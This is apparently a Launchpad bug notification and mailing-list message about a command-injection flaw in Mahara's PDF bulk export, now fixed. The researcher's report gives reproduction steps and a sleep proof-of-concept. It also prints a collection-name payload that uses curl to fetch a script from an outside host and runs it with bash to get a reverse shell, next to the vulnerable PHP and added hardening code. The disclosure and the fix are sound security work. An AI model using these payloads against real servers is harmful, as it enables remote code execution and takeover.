** Changed in: mahara/21.04
       Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Mahara
Contributors, which is subscribed to Mahara.
Matching subscriptions: mahara-contributors
https://bugs.launchpad.net/bugs/1942903

Title:
  Command injection vulnerability when PDF bulk export is enabled

Status in Mahara:
  Fix Released
Status in Mahara 20.04 series:
  Fix Released
Status in Mahara 20.10 series:
  Fix Released
Status in Mahara 21.04 series:
  Fix Released

Bug description:
  Hi team, I hope you're doing well! When the experimental PDF export
  feature is enabled, a user can craft a malicious collection in Mahara
  and trigger the command injection issue when an admin exports the
  attacker's data (either specifically or by exporting the institution
  the attacker belongs to).

  This was tested yesterday (2021-09-06) using the docker-compose file
  in the master branch of
  https://git.mahara.org/mahara/mahara/-/tree/master/docker

  ## Steps To Reproduce:

  URLs will be using `http://localhost:6142/mahara/` as that's my local
  instance's URL. Modify the base URL to fit your environment.

  ### Setup

  1. Login as administrator
  2. Go to the Plugin Administration page
     `http://localhost:6142/mahara/admin/extensions/plugins.php` and enable PDF at
     the bottom right of the page (installing some prerequisites on the server might
     be necessary, the plugins page should have instructions)

  ### Exploitation

  1. As the attacker (normal user account), create a collection named
     `;sleep${IFS}100;`
  2. As the administrator go to the bulk export page
     `http://localhost:6142/mahara/admin/users/bulkexport.php`
  3. Choose `PDF files of pages and collections` as the export format
  4. Set the attacker's username in `Usernames to export`
  5. Click `Export Accounts` and observe the 100 seconds delay in processing

  See the following section for a reverse shell example

  ## Details

  The issue comes from
  https://git.mahara.org/mahara/mahara/-/blob/master/htdocs/export/pdf/lib.php#L298

  ```php
  $collectionname = $this->collections[$collectionid]->get('name');
  $collectionname = parent::text_to_filename($collectionname);
  if ($combiner == 'pdfunite') {
      exec('pdfunite ' . implode(' ', $collection) . ' ' . $pdfdirectory . '/' . $collectionid . '_' . $collectionname . '.pdf', $output);
  }
  ```

  `$collectionname` is user controlled and the sanitization allows just
  enough characters to be able to inject commands

  
https://git.mahara.org/mahara/mahara/-/blob/master/htdocs/export/html/lib.php#L372-L375

  ```php
  public static function text_to_filename($text) {
      // truncates the text and replaces NOT allowed characters to hyphens
      return preg_replace('#["()*/:<>?\\| ]+#', '-', mb_substr($text, 0, parent::MAX_FILENAME_LENGTH, 'utf-8'));
  }
  ```

  In the attached video the malicious collection name is

  ```bash
  ;cd$IFS`mktemp$IFS-d`;curl${IFS}192.168.1.75$IFS-o${IFS}a.sh;bash${IFS}a.sh;
  ```

  and it triggered a reverse shell, see attached video. Note that I had
  to install curl on my server to make it work, but that's likely to be
  present on a real system.

  Suggested CVSS: AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H 8.0

  `AC:H` because of the setting that's likely to be disabled, `PR:L`
  because the payload is injected as a regular user, `UI:R` as it's
  triggered by an admin export, `S:C` as it impacts everything on the
  server once a reverse shell is obtained.

  Let me know if you need anything else!

  Dominic
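The root cause the report describes is a deny-list filename filter feeding a string-built `exec()`. The following is an added example written for this page, not Mahara's own fix: an allow-list replacement for `text_to_filename()` plus per-argument quoting of the `pdfunite` command. The constant `MAX_FILENAME_LENGTH`, the function names and the sample paths are assumptions; only the `;sleep${IFS}100;` collection name comes from the report.

```php
<?php
// Example hardening, not Mahara code. MAX_FILENAME_LENGTH is a placeholder
// for the project's own constant.
const MAX_FILENAME_LENGTH = 255;

// Allow-list instead of deny-list: keep letters, digits, '.', '_' and '-'.
// Every other run of characters collapses to one hyphen, so shell
// metacharacters (';', '`', '$', '{', '}', quotes) never reach the command.
function safe_text_to_filename(string $text): string
{
    $text = mb_substr($text, 0, MAX_FILENAME_LENGTH, 'utf-8');
    $text = preg_replace('/[^A-Za-z0-9._-]+/', '-', $text);
    $text = trim($text, '-.');            // no leading '.' (hidden/relative paths)
    return $text === '' ? 'untitled' : $text;
}

// Quote every argument individually. escapeshellarg() is defence in depth:
// even if the filename filter is loosened later, each value is passed to
// the shell as a single literal token rather than spliced into the command.
function build_pdfunite_command(array $inputPdfs, string $outputPdf): string
{
    $parts = ['pdfunite'];
    foreach ($inputPdfs as $pdf) {
        $parts[] = escapeshellarg($pdf);
    }
    $parts[] = escapeshellarg($outputPdf);
    return implode(' ', $parts);
}

// Guard that fails closed: refuse to build a command if any shell
// metacharacter survived sanitisation (should be unreachable after the
// allow-list above, but it makes a future regression loud).
function assert_shell_safe(string $name): void
{
    if (preg_match('/[^A-Za-z0-9._-]/', $name)) {
        throw new RuntimeException('Unsafe characters in filename component');
    }
}

// Constructed check using the proof-of-concept collection name from the report.
$collectionId   = 42;                      // constructed
$collectionName = ';sleep${IFS}100;';      // from the report
$pdfDirectory   = '/tmp/export';           // constructed

$safeName = safe_text_to_filename($collectionName);
assert_shell_safe($safeName);
$cmd = build_pdfunite_command(
    ['/tmp/export/page1.pdf', '/tmp/export/page2.pdf'],
    $pdfDirectory . '/' . $collectionId . '_' . $safeName . '.pdf'
);
echo $cmd, PHP_EOL;
```

On PHP 7.4 or later, passing the argument array directly to `proc_open()` avoids the shell entirely and is preferable to quoting for `exec()`.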

To manage notifications about this bug go to:
https://bugs.launchpad.net/mahara/+bug/1942903/+subscriptions


_______________________________________________
Mailing list: https://launchpad.net/~mahara-contributors
Post to     : mahara-contributors@lists.launchpad.net
Unsubscribe : https://launchpad.net/~mahara-contributors
More help   : https://help.launchpad.net/ListHelp
